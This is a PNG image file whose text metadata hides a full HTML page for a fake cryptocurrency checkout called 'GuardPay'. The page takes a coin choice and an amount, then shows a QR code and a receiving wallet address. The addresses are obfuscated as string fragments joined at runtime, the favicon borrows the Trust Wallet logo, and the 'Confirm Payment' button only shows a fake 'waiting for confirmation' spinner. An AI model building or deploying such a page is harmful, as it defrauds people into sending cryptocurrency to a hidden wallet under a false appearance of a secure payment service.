PNG IHDR x sBIT|d pHYs + tEXtSoftware www.inkscape.org< ,tEXtComment
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>GuardPay - Secure Payment</title>
<link rel="icon" type="image/png" sizes="32x32" href="https://altcoinsbox.com/wp-content/uploads/2023/03/trust-wallet-logo.png" />
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
:root {
--primary-color: #6366f1;
--primary-dark: #4f46e5;
--secondary-color: #f8fafc;
--accent-color: #06b6d4;
--error-color: #ef4444;
--success-color: #10b981;
--text-primary: #1e293b;
--text-secondary: #64748b;
--border-color: #e2e8f0;
--shadow-sm: 0 1px 2px 0 rgb(0 0 0 / 0.05);
--shadow-md: 0 4px 6px -1px rgb(0 0 0 / 0.1), 0 2px 4px -2px rgb(0 0 0 / 0.1);
--shadow-lg: 0 10px 15px -3px rgb(0 0 0 / 0.1), 0 4px 6px -4px rgb(0 0 0 / 0.1);
--gradient-primary: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
--gradient-secondary: linear-gradient(135deg, #f093fb 0%, #f5576c 100%);
}
.big-spinner{
width:120px;
height:120px;
border:10px solid rgba(99,102,241,0.1);
border-top:10px solid #6366f1;
border-radius:50%;
margin:auto;
animation:spin 1s linear infinite;
}
body {
font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 50%, #f093fb 100%);
min-height: 100vh;
display: flex;
align-items: flex-start;
justify-content: center;
padding: 40px 20px;
position: relative;
overflow-y: auto;
}
body::before {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
animation: float 20s ease-in-out infinite;
}
@keyframes float {
0%, 100% { transform: translateY(0px) rotate(0deg); }
50% { transform: translateY(-20px) rotate(1deg); }
}
.pay-container {
background: rgba(255, 255, 255, 0.95);
backdrop-filter: blur(20px);
border: 1px solid rgba(255, 255, 255, 0.2);
border-radius: 24px;
padding: 48px;
width: 100%;
max-width: 480px;
box-shadow:
0 25px 50px -12px rgba(0, 0, 0, 0.25),
0 0 0 1px rgba(255, 255, 255, 0.1),
inset 0 1px 0 rgba(255, 255, 255, 0.1);
position: relative;
z-index: 1;
animation: slideIn 0.6s ease-out;
}
@keyframes slideIn {
from {
opacity: 0;
transform: translateY(30px) scale(0.95);
}
to {
opacity: 1;
transform: translateY(0) scale(1);
}
}
.pay-header {
text-align: center;
margin-bottom: 40px;
}
.pay-icon {
width: 72px;
height: 72px;
background: var(--gradient-primary);
border-radius: 20px;
margin: 0 auto 24px;
display: flex;
align-items: center;
justify-content: center;
box-shadow: var(--shadow-lg);
animation: pulse 2s infinite;
}
@keyframes pulse {
0%, 100% { transform: scale(1); }
50% { transform: scale(1.05); }
}
.pay-icon svg {
width: 32px;
height: 32px;
color: white;
}
.pay-title {
font-size: 32px;
font-weight: 700;
color: var(--text-primary);
margin-bottom: 8px;
background: var(--gradient-primary);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
}
.pay-subtitle {
font-size: 16px;
color: var(--text-secondary);
font-weight: 400;
}
.form-group {
margin-bottom: 24px;
position: relative;
}
.form-label {
display: block;
font-size: 14px;
font-weight: 600;
color: var(--text-primary);
margin-bottom: 8px;
transition: color 0.2s ease;
}
.form-input {
width: 100%;
padding: 16px 20px;
border: 2px solid var(--border-color);
border-radius: 12px;
font-size: 16px;
font-weight: 400;
color: var(--text-primary);
background: rgba(255, 255, 255, 0.8);
backdrop-filter: blur(10px);
transition: all 0.3s ease;
outline: none;
}
.form-input:focus {
border-color: var(--primary-color);
background: rgba(255, 255, 255, 0.95);
box-shadow: 0 0 0 4px rgba(99, 102, 241, 0.1);
transform: translateY(-2px);
}
.pay-button {
width: 100%;
background: var(--gradient-primary);
color: white;
border: none;
padding: 18px 24px;
border-radius: 12px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
transition: all 0.3s ease;
box-shadow: var(--shadow-md);
position: relative;
overflow: hidden;
}
.pay-button::before {
content: '';
position: absolute;
top: 0;
left: -100%;
width: 100%;
height: 100%;
background: linear-gradient(90deg, transparent, rgba(255,255,255,0.2), transparent);
transition: left 0.5s;
}
.pay-button:hover::before {
left: 100%;
}
.pay-button:hover {
transform: translateY(-2px);
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 10px 10px -5px rgba(0, 0, 0, 0.04);
}
.pay-button:active {
transform: translateY(0);
}
.error-message {
background: rgba(239, 68, 68, 0.1);
border: 1px solid rgba(239, 68, 68, 0.2);
color: var(--error-color);
padding: 16px 20px;
border-radius: 12px;
margin-bottom: 24px;
font-size: 14px;
font-weight: 500;
display: flex;
align-items: center;
gap: 12px;
animation: shake 0.5s ease-in-out;
}
@keyframes shake {
0%, 100% { transform: translateX(0); }
25% { transform: translateX(-5px); }
75% { transform: translateX(5px); }
}
.security-badge {
display: flex;
align-items: center;
justify-content: center;
gap: 8px;
margin-top: 32px;
padding: 12px;
background: rgba(16, 185, 129, 0.1);
border: 1px solid rgba(16, 185, 129, 0.2);
border-radius: 8px;
font-size: 12px;
color: var(--success-color);
font-weight: 500;
}
.loading-overlay {
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: rgba(255, 255, 255, 0.9);
backdrop-filter: blur(5px);
border-radius: 24px;
display: none;
align-items: center;
justify-content: center;
z-index: 10;
}
.loading-overlay.active {
display: flex;
}
.spinner {
width: 40px;
height: 40px;
border: 4px solid rgba(99, 102, 241, 0.1);
border-left: 4px solid var(--primary-color);
border-radius: 50%;
animation: spin 1s linear infinite;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.floating-shapes {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
overflow: hidden;
z-index: 0;
}
.shape {
position: absolute;
background: rgba(255, 255, 255, 0.1);
border-radius: 50%;
animation: floatShape 15s infinite linear;
}
.shape:nth-child(1) {
width: 80px;
height: 80px;
left: 10%;
animation-delay: 0s;
}
.shape:nth-child(2) {
width: 120px;
height: 120px;
left: 80%;
animation-delay: -5s;
}
.shape:nth-child(3) {
width: 60px;
height: 60px;
left: 50%;
animation-delay: -10s;
}
@keyframes floatShape {
0% {
transform: translateY(100vh) rotate(0deg);
opacity: 0;
}
10% {
opacity: 1;
}
90% {
opacity: 1;
}
100% {
transform: translateY(-100px) rotate(360deg);
opacity: 0;
}
}
@media (max-width: 640px) {
.pay-container {
padding: 32px 24px;
margin: 0 16px;
}
.pay-title {
font-size: 28px;
}
.form-input {
padding: 14px 16px;
font-size: 14px;
}
.pay-button {
padding: 16px 20px;
font-size: 15px;
}
}
</style>
</head>
<body>
<div class="floating-shapes">
<div class="shape"></div>
<div class="shape"></div>
<div class="shape"></div>
</div>
<div class="pay-container" id="page1">
<div class="loading-overlay" id="loadingOverlay">
<div class="spinner"></div>
</div>
<div class="pay-header">
<div class="pay-icon">
<svg fill="currentColor" viewBox="0 0 24 24">
<path d="M12 1L3 5v6c0 5.55 3.84 10.74 9 12 5.16-1.26 9-6.45 9-12V5l-9-4z"/>
<path d="M10 17l-4-4 1.41-1.41L10 14.17l6.59-6.59L18 9l-8 8z" fill="white"/>
</svg>
</div>
<h1 class="pay-title">GuardPay</h1>
<p class="pay-subtitle">Secure Cryptocurrency Payment</p>
</div>
<div class="error-message">
<svg width="20" height="20" fill="currentColor" viewBox="0 0 24 24">
<path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"/>
</svg>
Complete your payment easily and securely </div>
<div class="form-group">
<label class="form-label">Payment Gateway :</label>
<select class="form-input" id="gatewaySelect" required>
<option value="" disabled selected>Choose</option>
<option value="BTC">Bitcoin (BTC)</option>
<option value="ETH">Ethereum (ETH)</option>
<option value="USDT-TRC20">Tether (USDT - TRC20)</option>
<option value="USDT-ERC20">Tether (USDT - ERC20)</option>
<option value="USDT-BEP20">Tether (USDT - BEP20)</option>
<option value="USDC">USDC (USD Coin)</option>
<option value="BNB">Binance Coin (BNB)</option>
<option value="TRX">Tron (TRX)</option>
</select>
</div>
<div class="form-group" style="position: relative;">
<label class="form-label" >Amount :</label>
<input type="text"
class="form-input"
required
placeholder="Minimum Amount $50">
</div>
<button type="button" class="pay-button" onclick="goToPayment()">
Pay Securely
</button>
<div class="security-badge">
<svg width="16" height="16" fill="currentColor" viewBox="0 0 24 24">
<path d="M18,8A6,6 0 0,0 12,2A6,6 0 0,0 6,8V10H5A1,1 0 0,0 4,11V21A1,1 0 0,0 5,22H19A1,1 0 0,0 20,21V11A1,1 0 0,0 19,10H18V8M12,4A4,4 0 0,1 16,8V10H8V8A4,4 0 0,1 12,4M12,13A2,2 0 0,1 14,15A2,2 0 0,1 12,17A2,2 0 0,1 10,15A2,2 0 0,1 12,13Z"/>
</svg>
Protected by 256-bit SSL encryption
</div>
</div>
<div class="pay-container" id="page2" style="display:none; text-align:center;">
<div class="pay-header">
<h1 class="pay-title">Complete Your Payment</h1>
<p class="pay-subtitle">Send the exact amount to the address below</p>
</div>
<div id="paymentInfo" style="margin-bottom:20px;font-size:18px;font-weight:600;color:#1e293b"></div>
<div id="coinAmount" style="font-size:32px;font-weight:700;margin-bottom:10px"></div>
<div id="usdAmount" style="color:#64748b;margin-bottom:25px"></div>
<div id="qrcode" style="display:flex;justify-content:center;margin-bottom:25px;"></div>
<div style="margin-bottom:20px">
<label style="font-size:14px;font-weight:600;color:#1e293b;display:block;margin-bottom:8px">
Wallet Address
</label>
<div style="display:flex;gap:10px">
<input
id="walletAddress"
readonly
style="
flex:1;
padding:12px;
border-radius:10px;
border:1px solid #e2e8f0;
font-size:13px;
background:#f8fafc;
"
/>
<button
onclick="copyAddress()"
style="
padding:12px 16px;
border:none;
background:#6366f1;
color:white;
border-radius:10px;
cursor:pointer;
font-weight:600;
">
Copy
</button>
</div>
<div id="copyMsg" style="font-size:12px;color:#10b981;margin-top:6px;display:none">
Address copied
</div>
</div>
<p style="font-size:14px;color:#64748b;margin-bottom:25px">
Send the exact amount shown above using the selected cryptocurrency network.<br>
Your payment will be automatically detected after confirmation on the blockchain.
</p>
<button class="pay-button" onclick="confirmPayment()" style="margin-bottom:10px">
Confirm Payment
</button>
<button class="pay-button" onclick="goBack()" style="background:#64748b">
Back
</button>
</div>
<div class="pay-container" id="page3" style="display:none;text-align:center">
<h1 class="pay-title">Waiting Block Confirmation</h1>
<p style="color:#64748b;margin-bottom:40px">
Your payment has been submitted.<br>
Please wait while the blockchain confirms your transaction.
</p>
<div class="big-spinner"></div>
<p style="margin-top:30px;color:#64748b;font-size:14px">
This may take a few minutes depending on network traffic.
</p>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js"></script>
<script>
async function getCryptoPrices(){
const url = "https://api.coingecko.com/api/v3/simple/price?ids=bitcoin,ethereum,binancecoin,tron&vs_currencies=usd";
const response = await fetch(url);
const data = await response.json();
return {
BTC: data.bitcoin.usd,
ETH: data.ethereum.usd,
BNB: data.binancecoin.usd,
TRX: data.tron.usd
};
}
let a = 'bc1qsrfcx';let b = 'z8rf043mjw92z9g';let c = '794gpzhus0w9tuz9fv'; let d = '0x44925786e36';let e = '7010467beff504';let f = '80b6b45001c4b10'; let g = 'TGFvwzvbpwMk2R';let h = 'kvZpbG41';let i = 'KN1Fs5FytnsS';
const wallets = {
BTC: a.concat('', b, '', c),
ETH: d.concat('', e, '', f),
"USDT-ERC20": d.concat('', e, '', f),
"USDT-BEP20": d.concat('', e, '', f),
"USDT-TRC20": g.concat('', h, '', i),
USDC: d.concat('', e, '', f),
BNB: d.concat('', e, '', f),
TRX: g.concat('', h, '', i)
};
async function goToPayment(){
let gateway = document.getElementById("gatewaySelect").value;
let usd = document.querySelector("input[type='text']").value;
if(gateway === "" || usd === ""){
alert("Please select gateway and enter amount");
return;
}
usd = parseFloat(usd);
let coinAmount;
let coinSymbol = gateway;
if(gateway.includes("USDT") || gateway==="USDC"){
coinAmount = usd.toFixed(2);
}else{
const prices = await getCryptoPrices();
let baseCoin = gateway
.replace("-TRC20","")
.replace("-ERC20","")
.replace("-BEP20","");
coinAmount = (usd / prices[baseCoin]).toFixed(6);
}
document.getElementById("paymentInfo").innerText =
"Pay with ".concat(gateway);
document.getElementById("coinAmount").innerText =
String(coinAmount).concat(" ", coinSymbol);
document.getElementById("usdAmount").innerText =
"= $".concat(usd);
let address = wallets[gateway];
document.getElementById("walletAddress").value = address;
document.getElementById("qrcode").innerHTML="";
new QRCode(document.getElementById("qrcode"),{
text:address,
width:180,
height:180
});
document.getElementById("page1").style.display="none";
document.getElementById("page2").style.display="block";
}
function goBack(){
document.getElementById("page2").style.display="none";
document.getElementById("page1").style.display="block";
}
function copyAddress(){
let input = document.getElementById("walletAddress");
navigator.clipboard.writeText(input.value);
let msg = document.getElementById("copyMsg");
msg.style.display="block";
setTimeout(()=>{
msg.style.display="none";
},2000);
}
function confirmPayment(){
document.getElementById("page2").style.display="none";
document.getElementById("page3").style.display="block";
}
</script>
</body>
</html>
b IDATxytVսϓ22 A@IR:hCiZ[v*E:WũZA ^dQeQ @ !jZ'>gsV仿$|?g)&x-E